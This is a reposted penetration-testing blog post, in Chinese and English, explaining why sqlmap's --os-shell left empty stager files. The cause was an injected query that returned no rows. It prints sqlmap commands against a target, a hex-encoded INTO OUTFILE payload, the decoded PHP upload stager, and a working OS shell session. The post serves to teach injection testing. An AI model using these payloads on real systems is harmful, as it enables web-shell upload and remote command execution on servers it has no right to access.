sqlmap寫文件爲空之謎

時間 2019-11-20

標籤 sqlmap 文件简体版

原文原文鏈接

恰逢有一個SQL注入能夠經過sqlmap進行，並且權限高得離譜，直接就是root權限。既然是root權限固然是想直接getshell咯。但是隻是sqlmap -u xxx --os-shell的時候卻失敗了php

 
        $ sqlmap -u 'http://php.0day5.com/login.php' --data='user=josh&pass=pass' --os-shell 
       
        sqlmap/1.0-dev - automatic SQL injection and database takeover tool 
       
        http://sqlmap.org 
       
        which web application language does the web server support? 
       
        [1] ASP 
       
        [2] ASPX 
       
        [3] JSP 
       
        [4] PHP (default) 
       
        > 
       
        [07:26:13] [WARNING] unable to retrieve automatically the web server document root 
       
        what do you want to use for web server document root? 
       
        [1] common location(s) '/var/www/' (default) 
       
        [2] custom location 
       
        [3] custom directory list file 
       
        [4] brute force search 
       
        > 
       
        [07:26:13] [WARNING] unable to retrieve automatically any web server path 
       
        [07:26:13] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique 
       
        [07:26:14] [WARNING] unable to upload the file stager on '/var/www' 
       
        [07:26:14] [INFO] fetched data logged to text files under '/home/0day5/.sqlmap/php.0day5.com' 
       
        [*] shutting down at 07:26:14

這裏的注入是一個報錯的注入，寫入失敗覺得是當前的目錄沒有可寫權限。屢次嘗試其餘的目錄都一一失敗了。嘗試了許久經過其餘的辦法搞到shell。反過來查看這裏爲嘛不能寫入，查看下/var/www目錄的權限css

 
        root@targetserver:/var/www# ls -l 
       
        total 48 
       
        -rw-r--r-- 1 root root 573 Jan 16 2013 alarms.php 
       
        drwxr-xr-x 2 root root 4096 Jan 16 2013 css 
       
        -rw-r--r-- 1 root root 634 Jan 16 2013 denied.php 
       
        -rw-r--r-- 1 root root 304 Jan 16 2013 footer.php 
       
        -rw-r--r-- 1 root root 3577 Dec 5 05:47 header.php 
       
        drwxr-xr-x 2 root root 4096 Jan 16 2013 images 
       
        -rw-r--r-- 1 root root 3516 Jan 16 2013 index.php 
       
        drwxr-xr-x 2 root root 4096 Jan 16 2013 js 
       
        -rw-r--r-- 1 root root 424 Dec 5 07:26 login.php 
       
        -rw-r--r-- 1 root root 198 Jan 16 2013 logout.php 
       
        -rw-r--r-- 1 root root 4455 Dec 4 17:01 reports.php 
       
        -rw-rw-rw- 1 mysql mysql 0 Dec 5 06:34 tmpubhkn.php 
       
        -rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuqitu.php 
       
        -rw-rw-rw- 1 mysql mysql 0 Dec 5 07:26 tmpurwem.php 
       
        -rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuvkgz.php 
       
        -rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuwtqk.php 
       
        -rw-rw-rw- 1 mysql mysql 0 Dec 5 06:36 tmpuxycr.php

看到tmp開頭的文件咱們就知道是sqlmap建立的文件。文件建立成功了可是文件內容卻沒有寫入。爲嘛這裏不能寫入的呢？思索了許久，直接拿在服務器上直接寫入須要執行的sql語句，以當前的權限去執行。html

 
   
    
      
        SELECT 
        *  
        FROM 
        user_credentials  
        WHERE 
        `username` =  
        'josh' 
        LIMIT 0,1  
        INTO 
        OUTFILE  
        '/var/www/tmpulhxi.php' 
        LINES TERMINATED  
        BY 
        0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a 
        -- AND 'PipI'='PipI' 
       
 
    
 
   
 

首先,sqlmap運行的基本要求,提供個人注射參數的輸入josh，再接下來,sqlmap運行查詢,執行「LIMIT 0,1 INTO OUTFILE …」語句。輸出文件的文件名是隨機選擇,寫入的內容是一個通過轉碼後的十六進制字符串,解碼以下:mysql

 
   
    
      
        <?php 
       
 
        if 
        (isset( 
        $_REQUEST 
        [ 
        "upload" 
        ])){ 
        $dir 
        = 
        $_REQUEST 
        [ 
        "uploadDir" 
        ]; 
        if 
        (phpversion()< 
        '4.1.0' 
        ){ 
        $file 
        = 
        $HTTP_POST_FILES 
        [ 
        "file" 
        ][ 
        "name" 
        ];@move_uploaded_file( 
        $HTTP_POST_FILES 
        [ 
        "file" 
        ][ 
        "tmp_name" 
        ], 
        $dir 
        . 
        "/" 
        . 
        $file 
        )  
        or 
        die 
        ();} 
        else 
        { 
        $file 
        = 
        $_FILES 
        [ 
        "file" 
        ][ 
        "name" 
        ];@move_uploaded_file( 
        $_FILES 
        [ 
        "file" 
        ][ 
        "tmp_name" 
        ], 
        $dir 
        . 
        "/" 
        . 
        $file 
        )  
        or 
        die 
        ();}@ 
        chmod 
        ( 
        $dir 
        . 
        "/" 
        . 
        $file 
        ,0755); 
        echo 
        "File uploaded" 
        ;} 
        else 
        { 
        echo 
        "<form action=" 
        . 
        $_SERVER 
        [ 
        "PHP_SELF" 
        ]. 
        " method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=/var/www> <input type=submit name=upload value=upload></form>" 
        ;}?> 
       
 
    
 
   
 

直接在mysql裏面去執行web

 
        mysql> SELECT * FROM user_credentials WHERE `username` =  
        'josh' 
        LIMIT 0,1 INTO OUTFILE  
        '/var/www/tmpulhxi.php' 
        LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a-- AND  
        'PipI' 
        = 
        'PipI' 
        ; 
       
        Query OK, 0 rows affected (0.00 sec)

當前結果就跟sqlmap一個樣子，獲得一個空文件，然而下面的這個語句更有用。sql

 
        mysql> SELECT * FROM user_credentials WHERE `username` =  
        'josh' 
        LIMIT 0,1; 
       
        Empty  
        set 
        (0.00 sec)

如下是原文shell

Recently I was working with a basic SQLi flaw, and wanted to get OS-level access. Naturally, I turned to sqlmap’s 「–os-shell」 feature.bash

$ sqlmap -u 'http://targetserver.mytarget.city.nw/login.php' --data='user=josh&pass=pass' --os-shell

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>
[07:26:13] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for web server document root?
[1] common location(s) '/var/www/' (default)
[2] custom location
[3] custom directory list file
[4] brute force search

>
[07:26:13] [WARNING] unable to retrieve automatically any web server path
[07:26:13] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[07:26:14] [WARNING] unable to upload the file stager on '/var/www'
[07:26:14] [INFO] fetched data logged to text files under '/home/jwright/.sqlmap/targetserver.mytarget.city.nw'

[*] shutting down at 07:26:14

The server here is vulnerable to SQLi through an error-based injection, but the os-shell fails to upload the file stager. I assumed the /var/www directory was not writable by the MySQL user, tried some other directories that all failed in the same way, and moved on to other techniques. However, later I saw this in the /var/www directory:服務器

root@targetserver:/var/www# ls -l
total 48
-rw-r--r-- 1 root root 573 Jan 16 2013 alarms.php
drwxr-xr-x 2 root root 4096 Jan 16 2013 css
-rw-r--r-- 1 root root 634 Jan 16 2013 denied.php
-rw-r--r-- 1 root root 304 Jan 16 2013 footer.php
-rw-r--r-- 1 root root 3577 Dec 5 05:47 header.php
drwxr-xr-x 2 root root 4096 Jan 16 2013 images
-rw-r--r-- 1 root root 3516 Jan 16 2013 index.php
drwxr-xr-x 2 root root 4096 Jan 16 2013 js
-rw-r--r-- 1 root root 424 Dec 5 07:26 login.php
-rw-r--r-- 1 root root 198 Jan 16 2013 logout.php
-rw-r--r-- 1 root root 4455 Dec 4 17:01 reports.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 06:34 tmpubhkn.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuqitu.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:26 tmpurwem.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuvkgz.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 07:31 tmpuwtqk.php
-rw-rw-rw- 1 mysql mysql 0 Dec 5 06:36 tmpuxycr.php

The files starting with 「tmpu」 are the stager files created through sqlmap’s os-shell feature. That they are empty explains why sqlmap returned the 「unable to upload file stager」 error, but since we know the 「mysql」 account can write here the question remains: why did sqlmap’s os-shell feature fail?app

Google’ing for similar situations brought me to Bas’ post describing a similar situation. He manually created the PHP shell with 「–sql-shell」, but I wanted to find out why sqlmap failed.

I added a line to the vulnerable login.php script to save queries to a file. Here is what sqlmap does when os-shell is used:

SELECT * FROM user_credentials WHERE `username` = 'josh'
SELECT * FROM user_credentials WHERE `username` = 'josh' LIMIT 0,1 INTO OUTFILE '/var/www/tmpulhxi.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a-- AND 'PipI'='PipI'

First, sqlmap runs the basic request, supplying my input ‘josh’ for the injectable parameter.
Next, sqlmap runs the query again, appending the 「LIMIT 0,1 INTO OUTFILE …」 declaration. The outfile filename is randomly selected, and sqlmap supplies a custom line terminator for the content to write to the outfile. This is a large hex string, which decodes to the following:

if (isset($_REQUEST["upload"])){$dir=
$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_F
ILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["
tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["na
me"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file
) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else 
{echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=mu
ltipart/form-data><input type=hidden name=MAX_FILE_SIZE value=10000
00000><b>sqlmap file uploader</b><br><input name=file type=file><br
>to directory: <input type=text name=uploadDir value=/var/www> <inp
ut type=submit name=upload value=upload></form>";}?>

Terrific, this is the sqlmap stager. Still, why does it create the file, but not populate the output file? I ran the query manually from a mysql shell to examine the output:

mysql> SELECT * FROM user_credentials WHERE `username` = 'josh' LIMIT 0,1 INTO OUTFILE '/var/www/tmpulhxi.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a-- AND 'PipI'='PipI';
Query OK, 0 rows affected (0.00 sec)

OK, that SQL creates the empty file, just like sqlmap does. However, this abbreviated query turned out to be more useful:

mysql> SELECT * FROM user_credentials WHERE `username` = 'josh' LIMIT 0,1;
Empty set (0.00 sec)

DOH! I made the cardinal sin of SQL injection exploitation: I didn’t start with valid data.

In my SANS classes, I tell students: Always Start with Valid Data (when performing SQL injection). If you identify a username parameter josh' that returns a database error, that’s great, but don’t supply that to sqlmap. Start with the valid data of josh, and let sqlmap figure out the rest (assisting sqlmap where necessary).

The problem here, and the reason for sqlmap’s empty files, is that the injected SELECT statement doesn’t return any records, so the delimiter PHP code is never written to a file. What does work is this:

$ sqlmap -u 'http://targetserver.mytarget.city.nw/login.php' --data='user=pconnor&pass=pass' --os-shell

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[07:49:38] [WARNING] unable to retrieve automatically any web server path
[07:49:38] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[07:49:38] [INFO] the file stager has been successfully uploaded on '/var/www' - http://targetserver.mytarget.city.nw:80/tmpuiqxs.php
[07:49:38] [INFO] the backdoor has been successfully uploaded on '/var/www' - http://targetserver.mytarget.city.nw:80/tmpbubmd.php
[07:49:38] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> uname -a
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:    'Linux targetserver.mytarget.city.nw 3.2.0-33-generic #52-Ubuntu SMP Thu Oct 18 16:29:15 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux'
os-shell>

Replacing my put-any-username-here 「josh」 reference with a valid username causes the SQL statement to return at least one record, which prompts the database to write the handler code to the file and returns an os-shell.

A valuable lesson for me, and hopefully others find it useful as well.

摘自：http://0cx.cc/

原文：http://www.willhackforsushi.com/?cat=12